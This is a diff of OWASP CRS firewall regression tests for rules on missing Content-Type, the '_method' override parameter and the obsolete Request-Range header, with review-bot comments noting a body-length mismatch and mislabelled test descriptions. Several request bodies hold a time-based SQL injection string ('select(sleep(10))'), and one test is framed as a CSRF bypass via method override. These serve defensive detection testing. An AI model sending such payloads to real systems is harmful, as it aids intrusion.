@@ -0,0 +1,196 @@ +--- +meta: + author: "fzipi" + description: "920640 must detect requests that have a request body but no `Content-Type` header" +rule_id: 920640 +tests: + - test_id: 1 + desc: POST request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "33" + Accept: "*/*" + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 2 + desc: POST request with body and proper Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/json" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + output: + log: + no_expect_ids: [920640] + - test_id: 3 + desc: GET request without body (negative test) + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920640] + - test_id: 4 + desc: | + POST request with body but empty Content-Type header value. 
+ For now, the test requires to have CL header for HTTP/1.1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "" + Content-Length: "33" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 5 + desc: | + POST request with body, no Content-Length and no Content-Type headers. + This will fail in the current HTTP/1.1 implementation, + but HTTP2 and up will work as the binary protocol will + have the proper length in the data. + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + data: '{"id_order":"select(sleep(10));"}' + autocomplete_headers: false + output: + status: [400] + - test_id: 6 + desc: POST request with simple text body and no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "9" + uri: "/test" + version: "HTTP/1.1" + data: "test_data" + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 7 + desc: POST request with XML body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "46" + uri: "/api" + version: 
"HTTP/1.1" + data: '123' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 8 + desc: PUT request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "PUT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "18" + uri: "/resource/1" + version: "HTTP/1.1" + data: '{"name":"updated"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] + - test_id: 9 + desc: POST request with Content-Length 0 (negative test - no actual body) + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: 0 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + autocomplete_headers: false + output: + log: + no_expect_ids: [920640] + - test_id: 10 + desc: PATCH request with body but no Content-Type header + stages: + - input: + dest_addr: "127.0.0.1" + method: "PATCH" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Length: "46" + uri: "/resource/1" + version: "HTTP/1.1" + data: '{"op":"replace","path":"/name","value":"test"}' + autocomplete_headers: false + output: + log: + expect_ids: [920640] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml new file mode 100644 index 0000000000..60d9f7f34a --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920650.yaml 
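Review bot: In test 7 of the new `920640.yaml` the declared `Content-Length: "46"` does not match the body shown as `data: '123'` (3 bytes); with `autocomplete_headers: false` the server will wait for 43 more bytes and the case can fail for reasons unrelated to the rule. If the XML markup was lost in this rendering, disregard; otherwise the body should be the 46-byte XML document the `desc` promises. Test 9 writes `Content-Length: 0` as a bare integer while every other header value in the file is a quoted string — use `"0"` so the headers map stays uniformly string-typed. Test 5 asserts `status: [400]` rather than a rule id, so it checks the HTTP server's parsing and not 920640; the `desc` says as much, but a comment such as `# documents engine behaviour, not rule 920640 - expected to change with HTTP/2` would stop it being read as a rule regression.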
@@ -0,0 +1,601 @@ +--- +meta: + author: "fzipi" + description: "Tests for HTTP method override via _method parameter detection (920650)" + +rule_id: 920650 + +tests: + # + # Positive tests - should trigger + # + + # Standard dangerous methods (uppercase) + - test_id: 1 + desc: "DELETE method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 2 + desc: "PUT method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=PUT" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 3 + desc: "PATCH method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=PATCH" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 4 + desc: "OPTIONS method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 5 + desc: "TRACE method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=TRACE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 6 + desc: "CONNECT method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=CONNECT" + headers: + User-Agent: "OWASP CRS test agent" + Host: 
"localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 7 + desc: "HEAD method override in query string" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=HEAD" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Lowercase methods (case insensitivity test) + - test_id: 8 + desc: "Lowercase delete method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=delete" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 9 + desc: "Mixed case Delete method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=Delete" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Request body methods (POST with form data) + - test_id: 10 + desc: "DELETE method override in POST body" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=DELETE&id=123" + output: + log: + expect_ids: [920650] + + - test_id: 11 + desc: "PUT method override in POST body" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=PUT&name=test" + output: + log: + expect_ids: [920650] + + # GET request with _method (SameSite bypass scenario) + - test_id: 12 + desc: "POST method override via GET request (CSRF bypass)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + 
uri: "/transfer?amount=1000&_method=POST" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # WebDAV methods + - test_id: 13 + desc: "PROPFIND WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/file?_method=PROPFIND" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 14 + desc: "PROPPATCH WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/file?_method=PROPPATCH" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 15 + desc: "MKCOL WebDAV method override" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/webdav/folder?_method=MKCOL" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Minimum length methods (3 chars) + - test_id: 16 + desc: "GET method override (3 chars - minimum)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + - test_id: 17 + desc: "PUT method override (3 chars)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/resource?_method=PUT" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Maximum length methods (10 chars) + - test_id: 18 + desc: "ABCDEFGHIJ method override (10 chars - maximum)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=ABCDEFGHIJ" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" 
+ Accept: "*/*" + output: + log: + expect_ids: [920650] + + # + # Negative tests - should NOT trigger + # + + # Too short (less than 3 characters) + - test_id: 19 + desc: "Negative - 2 character value (too short)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=AB" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 20 + desc: "Negative - 1 character value (too short)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=X" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Too long (more than 10 characters) + - test_id: 21 + desc: "Negative - 11 character value (too long)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=ABCDEFGHIJK" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 22 + desc: "Negative - UNSUBSCRIBE (11 chars - too long)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=UNSUBSCRIBE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Contains non-alpha characters + - test_id: 23 + desc: "Negative - Contains digit" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DELETE1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 24 + desc: "Negative - Contains hyphen" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=X-DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 
"*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 25 + desc: "Negative - Contains underscore" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=DO_DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 26 + desc: "Negative - Contains space" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "_method=DEL ETE" + output: + log: + no_expect_ids: [920650] + + # Empty or missing value + - test_id: 27 + desc: "Negative - Empty _method value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Different parameter name + - test_id: 28 + desc: "Negative - method parameter (not _method)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 29 + desc: "Negative - http_method parameter" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?http_method=DELETE" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Normal requests without _method + - test_id: 30 + desc: "Negative - Normal GET request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/users/123" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 
31 + desc: "Negative - Normal POST request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/users" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "name=test&email=test@example.com" + output: + log: + no_expect_ids: [920650] + + # Non-method-like values + - test_id: 32 + desc: "Negative - Numeric value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=12345" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + - test_id: 33 + desc: "Negative - Mixed alphanumeric" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=abc123def" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920650] + + # Configuration bypass test (when tx.allow_method_override_parameter=1) + # Note: This test verifies behavior when the configuration allows _method + # The actual bypass depends on the rule chain checking tx.allow_method_override_parameter + - test_id: 34 + desc: "Edge case - _method with URL-encoded value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?_method=%44%45%4C%45%54%45" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] + + # Multiple parameters + - test_id: 35 + desc: "DELETE method with other parameters" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/resource?id=123&_method=DELETE&confirm=true" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + expect_ids: [920650] 
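Review bot: The comment block above test 34 in `920650.yaml` (`# Configuration bypass test (when tx.allow_method_override_parameter=1)` and the two lines after it) describes a test that does not exist — test 34 is the URL-encoded `%44%45%4C%45%54%45` edge case, and nothing in the file exercises the `tx.allow_method_override_parameter` toggle. Either attach that comment to a real test that sets the variable and asserts `no_expect_ids: [920650]`, or delete it so the file does not promise coverage it lacks. Test 18 treats the arbitrary token `ABCDEFGHIJ` as a positive, which documents that the rule fires on any 3–10 letter value rather than a known method; a one-line comment stating that this is deliberate would help the next reader.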
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml
new file mode 100644
index 0000000000..af7dc93ce9
--- /dev/null
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920660.yaml
@@ -0,0 +1,541 @@ +--- +meta: + author: "fzipi" + description: "Tests for obsolete Request-Range header detection (920660)" + +rule_id: 920660 + +tests: + # + # Positive tests - should trigger + # + + # Basic Request-Range header presence + - test_id: 1 + desc: "Request-Range header with simple byte range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + - test_id: 2 + desc: "Request-Range header with open-ended range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/video.mp4" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1024-" + output: + log: + expect_ids: [920660] + + - test_id: 3 + desc: "Request-Range header with suffix range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/audio.mp3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=-500" + output: + log: + expect_ids: [920660] + + - test_id: 4 + desc: "Request-Range header with multiple ranges" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/file.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-100,200-300,400-500" + output: + log: + expect_ids: [920660] + + # Case variations (HTTP headers are case-insensitive) + - test_id: 5 + desc: "Request-Range header with mixed case" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download.zip" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + request-range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + - test_id: 6 + desc: "REQUEST-RANGE header in uppercase" + stages: + - input: + dest_addr: 
"127.0.0.1" + port: 80 + method: "GET" + uri: "/large-file.iso" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + REQUEST-RANGE: "bytes=1000-2000" + output: + log: + expect_ids: [920660] + + # Different HTTP methods + - test_id: 7 + desc: "Request-Range in POST request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/upload" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-512" + Content-Type: "application/x-www-form-urlencoded" + data: "action=resume" + output: + log: + expect_ids: [920660] + + - test_id: 8 + desc: "Request-Range in HEAD request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "HEAD" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-0" + output: + log: + expect_ids: [920660] + + - test_id: 9 + desc: "Request-Range in PUT request" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "PUT" + uri: "/upload/file.dat" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1024-2047" + Content-Type: "application/octet-stream" + data: "binary-data-here" + output: + log: + expect_ids: [920660] + + # Edge cases for header values + - test_id: 10 + desc: "Request-Range with whitespace in value" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/data.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: " bytes=0-1023 " + output: + log: + expect_ids: [920660] + + - test_id: 11 + desc: "Request-Range with large range values" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/bigfile.iso" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=1073741824-2147483647" + output: + log: + expect_ids: 
[920660] + + - test_id: 12 + desc: "Request-Range with zero range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/tiny.txt" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-0" + output: + log: + expect_ids: [920660] + + # Simulating old browser behavior (Netscape 2-3, MSIE 3) + - test_id: 13 + desc: "Request-Range with old Netscape user agent" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download.exe" + headers: + User-Agent: "Mozilla/3.0 (Win95; I)" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=0-8191" + output: + log: + expect_ids: [920660] + + - test_id: 14 + desc: "Request-Range with old MSIE user agent" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/update.cab" + headers: + User-Agent: "Mozilla/2.0 (compatible; MSIE 3.0; Windows 95)" + Host: "localhost" + Accept: "*/*" + Request-Range: "bytes=16384-32767" + output: + log: + expect_ids: [920660] + + # Malformed but present header + - test_id: 15 + desc: "Request-Range with invalid syntax (still triggers as header exists)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "invalid-range-spec" + output: + log: + expect_ids: [920660] + + - test_id: 16 + desc: "Request-Range with empty value (header still present)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/test.html" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Request-Range: "" + output: + log: + expect_ids: [920660] + + # Request-Range alongside standard Range header + - test_id: 17 + desc: "Both Request-Range and Range headers present" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/media.mp4" + headers: + User-Agent: "OWASP CRS 
test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-1023" + Request-Range: "bytes=0-1023" + output: + log: + expect_ids: [920660] + + # + # Negative tests - should NOT trigger + # + + # Normal requests with standard Range header (RFC 9110 compliant) + - test_id: 18 + desc: "Negative - Standard Range header (RFC 9110)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/video.mp4" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 19 + desc: "Negative - Range header with multiple ranges" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/document.pdf" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-100,200-300" + output: + log: + no_expect_ids: [920660] + + - test_id: 20 + desc: "Negative - Normal GET request without Range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/index.html" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] + + - test_id: 21 + desc: "Negative - POST request without Range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/api/data" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "name=test&value=123" + output: + log: + no_expect_ids: [920660] + + # Other headers with similar names + - test_id: 22 + desc: "Negative - If-Range header (conditional range request)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/large.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Range: "bytes=1024-2047" + If-Range: "Wed, 21 Oct 2015 07:28:00 GMT" + output: + log: + no_expect_ids: [920660] + + - 
test_id: 23 + desc: "Negative - Content-Range header in response (should not trigger)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/data.zip" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Range: "bytes 0-1023/4096" + output: + log: + no_expect_ids: [920660] + + - test_id: 24 + desc: "Negative - Accept-Ranges in request (unusual but not Request-Range)" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + uri: "/resource" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Accept-Ranges: "bytes" + output: + log: + no_expect_ids: [920660] + + # Modern browsers and clients + - test_id: 25 + desc: "Negative - Modern Chrome with standard Range header" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/stream.webm" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" + Host: "localhost" + Accept: "*/*" + Range: "bytes=0-" + output: + log: + no_expect_ids: [920660] + + - test_id: 26 + desc: "Negative - Modern Firefox with standard Range header" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/music.ogg" + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" + Host: "localhost" + Accept: "*/*" + Range: "bytes=8192-16383" + output: + log: + no_expect_ids: [920660] + + # Edge cases + - test_id: 27 + desc: "Negative - Query parameter named request_range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/api/download?request_range=0-1023" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] + + - test_id: 28 + desc: "Negative - POST body containing 'Request-Range' text" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + 
method: "POST" + uri: "/api/logs" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + data: "log=Request-Range%3A+bytes%3D0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 29 + desc: "Negative - Custom header X-Request-Range" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/download" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + X-Request-Range: "bytes=0-1023" + output: + log: + no_expect_ids: [920660] + + - test_id: 30 + desc: "Negative - HEAD request without any range headers" + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "HEAD" + uri: "/file.bin" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "*/*" + output: + log: + no_expect_ids: [920660] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index dc397acbf2..3163477f89 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml @@ -4,8 +4,13 @@ meta: description: "LDAP injection" rule_id: 921200 tests: + # + # === Negative Tests (should NOT trigger rule 921200) === + # + + # --- Existing FP tests from original file --- - test_id: 1 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with objectCategory and userAccountControl attributes, valid query" stages: - input: dest_addr: "127.0.0.1" 
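Review bot: Test 23's `desc` says the Content-Range header is "in response", but the stage sends it as a request header, which is all a request-phase rule ever sees; `desc: "Negative - Content-Range request header (should not trigger)"` describes what is actually exercised. Test 16 asserts a hit on `Request-Range: ""`, and whether an empty header value survives the client and server and reaches the rule is not something this file can guarantee — if the rule matches on the header's value rather than on its presence, this is the one test likely to be flaky, so a comment such as `# rule keys on header presence, so an empty value must still match` would make the intent checkable against the rule. Test 5's `desc` says "mixed case" but the header name sent is plain lowercase `request-range`; "lowercase" is the accurate word.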
